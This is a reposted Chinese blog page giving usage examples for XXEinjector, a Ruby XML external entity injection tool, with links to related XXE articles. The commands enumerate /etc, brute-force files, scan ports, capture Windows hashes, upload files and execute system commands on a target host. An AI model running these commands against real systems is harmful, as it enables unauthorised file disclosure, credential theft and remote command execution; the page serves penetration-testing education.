XXEInjection用法

最新推荐文章于 2025-07-18 10:11:24 发布
转载 最新推荐文章于 2025-07-18 10:11:24 发布 · 451 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://my.oschina.net/phybrain/blog/1572250
文章标签:

#ruby #python #php

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

使用方法
列 /etc 目录 通过https:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
Enumerating /etc directory using gopher for OOB method:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
二次注入:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt 
通过http协议暴力枚举文件:

ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
直接枚举:

ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
枚举所有端口:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
获取windows hash:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
通过java的jar上传文件:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
执行系统命令使用 PHP expect:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
测试XSLT注入:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
记录请求日志:

ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt

转载于:https://my.oschina.net/phybrain/blog/1572250

WEB漏洞-XXE&XML之利用检测绕过
m0_65137829的博客
07-24 1647
XXE-"xml external entity injection" 服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
7.XXEinjector:一款功能强大的自动化XXE注射工具
weixin_30492047的博客
09-09 671
今天给大家介绍的是一款名叫XXEinjector的漏洞利用工具,XXEinjector是一款基于Ruby的XXE注入工具, 它可以使用多种直接或间接带外方法来检索文件。其中,目录枚举功能只对Java应用程序有效,而暴力破解 攻击需要使用到其他应用程序。 XXEinjector注入工具的使用 XXEinjector本身提供了非常非常丰富的操作选项,所以大家在利用XXEinjector进行渗透...
XXEinjector
weixin_34059951的博客
11-16 237
https://github.com/enjoiz/XXEinjector 本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/2053838 ,如需转载请自行联系原作者 ...
XXEinjector.zip
08-24
XXEinjector 一款XXE注入测试工具,可以通过命令行快速检测可能存在的XXE漏洞!
XXEinjector:一款功能强大的自动化XXE注射工具从零基础到精通,收藏这篇就够了!
最新发布
Python84310366的博客
07-18 757
还在手动构造 XXE 注入 payload?OUT 啦!今天给大家安利一款,让你轻松驾驭 XXE 漏洞,成为网络安全界的弄潮儿!XXEinjector 是一款基于 Ruby 开发的 XXE 注入工具,它支持多种直接或间接的带外 (OOB) 方法来提取文件。不过要注意,目录枚举功能目前只对 Java 应用有效,而暴力破解攻击则可能需要与其他应用配合使用,才能发挥最大威力。
网络安全课第五节 XXE 漏洞的检测与防御
fegus的博客
07-11 1739
上一讲我们介绍了 SSRF 漏洞,一种专门针对服务端的请求伪造攻击,常被用于攻击内网。在里面我介绍了 Burp Collaborator 用于专门测试无回显漏洞的功能,在本讲的 XXE 漏洞测试中,我们依然可以使用,不知道你是否还记得怎么使用?下面,我们就开始今天的课程,一场关于 XML 外部实体注入(XXE)漏洞的攻防之路。XXE(XML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。PHP
XXEinjector全过程安装详细和使用教程
星语惜馨的博客
07-14 4899
xml的xxe漏洞是目前Java比较关注的,使用多种直接或间接带外方法来检索文件,目录枚举功能只对Java应用程序有效,而暴力破解攻击需要使用到其他应用程序。由于网上都是只有使用教程或者介绍功能(可能像我这样需要傻瓜式的有点少),我就收集整理详细一点。 搭建的系统:ubuntukylin-16.04-desktop-amd64(比较习惯有gui的) xxeinjector工具:https...
XEinjector:一款功能强大的自动化XXE注射工具,从零级基础到精通,收藏这篇就够了!
Javachichi的博客
03-31 931
XXEinjector 是一款功能强大的 XXE 注入工具,可以帮助安全研究人员和渗透测试人员快速发现和利用 XXE 漏洞。但是,请务必在授权的情况下使用该工具,切勿用于非法用途!
XXE Injection笔记
Bendawang's Blog
07-05 3936
XXE Injection笔记
xxe-injection-payload-list::bullseye:XML外部实体(XXE)注入有效负载列表
02-06
xxe-injection-payload-list::bullseye:XML外部实体(XXE)注入有效负载列表
刚开始学XXE漏洞,可以看看这个博客.md
05-05
刚开始学XXE漏洞的时候,很懵,看见了这个博客,就转载一下,希望对刚接触这个东西的同学有帮助,刚学的时候浪费了很多时间,希望别人可以少浪费这个找资源的时间
XXE工具——XXEinjection安装与使用
永远是少年
12-23 2106
今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE工具——XXEinjection安装与使用。 一、XXEinjection工具介绍 二、Ruby环境安装 三、XXEinjection常用参数说明 四、XXEinjection使用示例
XXE注入攻击与防御
weixin_30565327的博客
11-28 168
在研究XXE注入攻击之前先了解一下什么是XXE 定义 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 文档结构 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 <!--XML声明--> <...
【网络安全】web漏洞-xml外部实体注入(XXE)
ZL_1618的博客
01-06 1472
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
Xxe外部实体注入(XML External Entity Injection)
xuyunpeng3189的博客
01-23 1269
无回显的xxe怎么利用 (1)使用dnslog平台进行数据外带 (2)构造远程dtd文件造成文件外泄 Xxe详细防御方法 禁用外部实体 这是防范最为严格的手段,从前面的学习我们已经知道XXE的全部利用手段基础都来源于外部实体的注入, 也就是如果禁用了外部实体,那么XXE的所有攻击手段都将失效,无法再正常利用。 代码层禁用 PHP: libxml_disable_entity_loader(true); JAVA: DocumentBuilderFactory dbf =DocumentBuil
Kali 安装 Ruby环境 和 XXE神器XXEinjector 教程
Jay17的博客
08-05 1004
Kali 安装 Ruby环境 和 XXE神器XXEinjector 教程
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值